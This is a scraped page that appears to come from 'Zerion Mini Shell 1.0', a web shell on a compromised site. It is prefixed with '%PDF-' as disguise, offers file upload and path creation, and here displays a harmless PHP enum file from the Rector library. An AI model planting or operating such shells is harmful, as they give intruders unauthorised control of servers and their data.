%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/vacivi36/vacivitta.com.br/vendor/rector/rector/src/Enum/
Upload File :
Create Path :
Current File : /home/vacivi36/vacivitta.com.br/vendor/rector/rector/src/Enum/ObjectReference.php

<?php

declare (strict_types=1);
namespace Rector\Core\Enum;

use RectorPrefix20211231\MyCLabs\Enum\Enum;
/**
 * @see https://github.com/myclabs/php-enum
 *
 * @method static ObjectReference SELF()
 * @method static ObjectReference STATIC()
 * @method static ObjectReference PARENT()
 */
final class ObjectReference extends \RectorPrefix20211231\MyCLabs\Enum\Enum
{
    /**
     * @var string
     */
    private const SELF = 'self';
    /**
     * @var string
     */
    private const PARENT = 'parent';
    /**
     * @var string
     */
    private const STATIC = 'static';
}

Zerion Mini Shell 1.0